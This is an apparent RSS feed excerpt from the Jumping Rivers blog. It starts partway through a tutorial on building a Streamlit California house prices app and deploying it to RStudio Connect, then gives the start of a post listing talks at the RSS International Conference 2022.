&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Give our app a title&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;title(&lt;span style="color:#a5d6ff"&gt;&amp;#34;California House Prices&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Load our data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@st.cache&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# cache the data so it isn&amp;#39;t reloaded every time&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;load_data&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; housing &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; fetch_california_housing()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(housing&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;data, columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;housing&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;feature_names)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data[&lt;span style="color:#a5d6ff"&gt;&amp;#34;medprice&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; housing&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;target
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; lowercase &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;lambda&lt;/span&gt; x: str(x)&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;lower()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rename(lowercase, axis&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;columns&amp;#34;&lt;/span&gt;, inplace&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data_load_state &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Loading data...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; load_data()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data_load_state&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Data loaded!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a tickbox to display the raw data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;checkbox(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Show raw data&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subheader(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Raw data&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;write(data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a plotly figure&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subheader(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Plot data with Plotly&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fig &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; px&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;scatter(data, x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;medinc&amp;#34;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;medprice&amp;#34;&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;averooms&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;fig&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;update_layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; font_family&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Courier New&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xaxis_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;median income / $10000&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; yaxis_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;median house price / $100000&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plotly_chart(fig)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a map of datapoints&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subheader(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Map data points with `st.map()`&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;filter_price &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;slider(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Maximum price / $100000&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5.0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5.0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# a slider widget to select price&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;filtered_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[data[&lt;span style="color:#a5d6ff"&gt;&amp;#34;medprice&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; filter_price]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;map(filtered_data)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add a pydeck map&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;subheader(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Map LA house prices with pydeck&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;st&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;pydeck_chart(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pdk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Deck(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; map_style&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;mapbox://styles/mapbox/light-v9&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; initial_view_state&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;pdk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ViewState(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; latitude&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;33.7783&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; longitude&lt;span style="color:#ff7b72;font-weight:bold"&gt;=-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;118.253&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pitch&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; layers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pdk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Layer(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;HexagonLayer&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; get_position&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;[longitude, latitude]&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; radius&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;medprice&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elevation_scale&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elevation_range&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pickable&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; extruded&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To test this app you can run it locally with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;streamlit run streamlit_housing.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will automatically open up a window displaying the app.&lt;/p&gt;
&lt;p&gt;&lt;img alt="streamlit demo app" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/streamlit_housing.png" width="741"&gt;&lt;/p&gt;
&lt;p&gt;One of the nice things about Streamlit is that it makes it really easy to view our app as we create it. If you navigate to &amp;ldquo;Settings&amp;rdquo; from the top right menu and tick &amp;ldquo;Run on save&amp;rdquo;, the app will be updated every time the source script is saved.&lt;/p&gt;
&lt;p&gt;Here we have used the Plotly plotting library but the Streamlit API also enables plotting with other libraries such as &lt;a href="http://docs.bokeh.org/en/latest/" rel="external"&gt;Bokeh&lt;/a&gt; and &lt;a href="https://matplotlib.org/" rel="external"&gt;Matplotlib&lt;/a&gt;.
The API documentation can be found &lt;a href="https://docs.streamlit.io/library/api-reference" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="deploying-to-rstudio-connect"&gt;Deploying to RStudio Connect&lt;/h3&gt;
&lt;p&gt;In order to deploy our Streamlit app to RStudio Connect, we first of all need to install &lt;code&gt;rsconnect-python&lt;/code&gt; with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv install rsconnect-python
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you have not done so already, you will need to add the server which you wish to deploy to. The first step is to create an API key. Log into RStudio Connect and click on your user icon in the top left corner, navigate to &amp;ldquo;API Keys&amp;rdquo; and add a new API key.&lt;/p&gt;
&lt;p&gt;&lt;img alt="user menu icon" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/menu.png" width="1003"&gt;&lt;/p&gt;
&lt;p&gt;Remember to save the API key somewhere as it will only be shown to you once!&lt;/p&gt;
&lt;p&gt;It is also useful to set an API key environment variable in a &lt;code&gt;.env&lt;/code&gt; file. This can be done by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;echo &lt;span style="color:#a5d6ff"&gt;&amp;#39;export CONNECT_API_KEY=&amp;lt;your_api_key&amp;gt;&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; .env
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .env
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you wish, you could also add an environment variable for the server you are using,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;CONNECT_SERVER&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&amp;lt;your server url&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the server URL is the part of the URL that comes before &lt;code&gt;connect/&lt;/code&gt;, and it must include a trailing slash.&lt;/p&gt;
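&lt;p&gt;As a rough illustration of that rule, the sketch below derives the server URL from a URL copied out of the browser. The helper name &lt;code&gt;connect_server_url&lt;/code&gt; and the example hostnames are assumptions made for this illustration; they are not part of &lt;code&gt;rsconnect-python&lt;/code&gt;.&lt;/p&gt;

```python
from urllib.parse import urlsplit


def connect_server_url(dashboard_url):
    """Return the part of a Connect URL before 'connect/', with a trailing slash.

    Hypothetical helper for illustration only.
    """
    parts = urlsplit(dashboard_url)
    # Keep any path prefix that appears before the "/connect/" segment
    prefix, _, _ = parts.path.partition("/connect/")
    # The server URL must end with a trailing slash
    if not prefix.endswith("/"):
        prefix += "/"
    return f"{parts.scheme}://{parts.netloc}{prefix}"


# Example hostnames are placeholders, not real servers
print(connect_server_url("https://connect.example.com/connect/#/content"))
print(connect_server_url("https://example.com/rsc/connect/#/apps"))
```

&lt;p&gt;The value returned is what you would store in &lt;code&gt;CONNECT_SERVER&lt;/code&gt;.&lt;/p&gt;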
&lt;p&gt;Now we can add the server with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect add --server &lt;span style="color:#79c0ff"&gt;$CONNECT_SERVER&lt;/span&gt; --name &amp;lt;server nickname&amp;gt; --api-key &lt;span style="color:#79c0ff"&gt;$CONNECT_API_KEY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can check the server has been added and view its details with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect list
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Before we deploy our app, there is one more thing to watch out for. Unless you have a &lt;code&gt;requirements.txt&lt;/code&gt; file in the same directory as your app, RStudio Connect will freeze your current environment. Therefore, make sure you run the deploy command from the virtual environment in which you created your Streamlit app, since this is the environment that will be reproduced on the server.&lt;/p&gt;
&lt;p&gt;We are now ready to deploy our Streamlit app by running,&lt;/p&gt;
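&lt;p&gt;To see what freezing the current environment would capture, it can help to list the installed packages before deploying. The sketch below uses only the standard library and is roughly comparable to, but not identical to, the output of &lt;code&gt;pip freeze&lt;/code&gt;. The function name &lt;code&gt;frozen_requirements&lt;/code&gt; is an assumption made for this illustration.&lt;/p&gt;

```python
from importlib.metadata import distributions


def frozen_requirements():
    """Return sorted 'name==version' pins for packages in the active environment.

    Hypothetical helper for illustration; it does not handle editable installs.
    """
    pins = set()
    for dist in distributions():
        name = dist.metadata.get("Name")
        if name:  # skip broken installs that lack metadata
            pins.add(f"{name}=={dist.version}")
    return sorted(pins, key=str.lower)


# Print the pins so they can be inspected before deploying
print("\n".join(frozen_requirements()))
```

&lt;p&gt;If the list contains packages that your app does not need, consider deploying from a cleaner virtual environment or writing a &lt;code&gt;requirements.txt&lt;/code&gt; by hand.&lt;/p&gt;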
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect deploy streamlit -n &amp;lt;server nickname&amp;gt; . --entrypoint streamlit_housing.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;from the &lt;code&gt;streamlit-deploy-demo&lt;/code&gt; directory. The &lt;code&gt;--entrypoint&lt;/code&gt; flag in the command above tells RStudio Connect where our app is located. For Streamlit the entrypoint is just the name of the file which contains our app.&lt;/p&gt;
&lt;p&gt;Congrats, your Streamlit app has been deployed! You can check it by following the output link to RStudio Connect.&lt;/p&gt;
&lt;h2 id="further-reading"&gt;Further reading&lt;/h2&gt;
&lt;p&gt;We hope you found this post useful!&lt;/p&gt;
&lt;p&gt;If you wish to learn more about Streamlit or deploying applications to RStudio Connect you may be interested in the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.streamlit.io/library/get-started/create-an-app" rel="external"&gt;Streamlit tutorial&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.rstudio.com/connect/user/publishing/" rel="external"&gt;Publishing to RStudio Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-posit-connect-deployment-management/" rel="external"&gt;Introduction to RStudio Connect course&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Talks to watch at the RSS International Conference</title><link>https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/</link><pubDate>Tue, 06 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://rss.org.uk/training-events/conference2022/" rel="external"&gt;RSS International Conference 2022&lt;/a&gt; is happening next week from 12-15 September 2022, hosted in Aberdeen for the first time! Jumping Rivers are exhibiting at the conference, as well as delivering workshops and talks. These are a couple of the sessions we&amp;rsquo;re looking forward to the most!&lt;/p&gt;
&lt;h2 id="highlights"&gt;Highlights&lt;/h2&gt;
&lt;h3 id="spatial-modelling-and-visualisation-using-r-and-inla"&gt;Spatial modelling and visualisation using R and INLA&lt;/h3&gt;
&lt;p&gt;This &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36341&amp;s=1050" rel="external"&gt;workshop&lt;/a&gt; by Dr. Paula Moraga focuses on spatial data. Among other things, you&amp;rsquo;ll learn how to fit models, create static and interactive visualizations, and build Shiny apps to communicate your results.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Wednesday, 14 September, 2022. 09:00-11:50.&lt;/p&gt;
&lt;h3 id="teaching-ethics-and-responsible-communication-of-statistics-and-models"&gt;Teaching ethics and responsible communication of statistics and models&lt;/h3&gt;
&lt;p&gt;Training is a big part of what we do at Jumping Rivers, and so we&amp;rsquo;re always excited to hear about other people&amp;rsquo;s teaching practices. In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=45003&amp;s=2018" rel="external"&gt;session&lt;/a&gt;, featuring three different talks, the focus is on actionable ways to include the topic of ethics in data science when delivering statistical training.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Thursday, 15 September, 2022. 14:00-15:00.&lt;/p&gt;
&lt;h3 id="data-science-in-industry---an-introduction-to-mlops"&gt;Data Science in Industry - an introduction to MLOps&lt;/h3&gt;
&lt;p&gt;This &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36314&amp;s=1282" rel="external"&gt;session&lt;/a&gt; will bring leading voices in MLOps to discuss what data scientists need to know about MLOps, and how those working in data science can collaborate with their engineering and ops colleagues.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Tuesday, 13 September, 2022. 11:40-13:00.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-rss-international-conference-talks-to-watch"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="jumping-rivers-talks-and-events"&gt;Jumping Rivers Talks and Events&lt;/h2&gt;
&lt;h3 id="early-career-researcher-pre-conference-workshop"&gt;Early Career Researcher pre-conference workshop&lt;/h3&gt;
&lt;p&gt;Nicola will be delivering a talk in the presentation skills workshop as part of the Early Career Researcher pre-conference &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36304&amp;s=209" rel="external"&gt;workshop&lt;/a&gt;, organised by the Young Statisticians Section. Her talk will discuss how to give better technical presentations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Monday, 12 September, 2022. 14:45-15:45.&lt;/p&gt;
&lt;h3 id="share-your-models-with-r-plumber-apis"&gt;Share your Models with R {plumber} APIs&lt;/h3&gt;
&lt;p&gt;In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/submission/307" rel="external"&gt;talk&lt;/a&gt;, Rhian will introduce what an API is, how the {plumber} package works and show you how to share the statistical models you develop with the world.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Tuesday, 13 September, 2022. 14:00-15:20.&lt;/p&gt;
&lt;h3 id="a-quality-improvement-approach-to-assessing-knowledge-exchange"&gt;A quality improvement approach to assessing Knowledge Exchange&lt;/h3&gt;
